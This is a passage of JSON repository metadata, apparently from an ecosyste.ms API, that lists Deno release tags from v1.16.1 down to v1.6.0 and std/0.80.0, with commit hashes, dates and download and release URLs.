ositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/a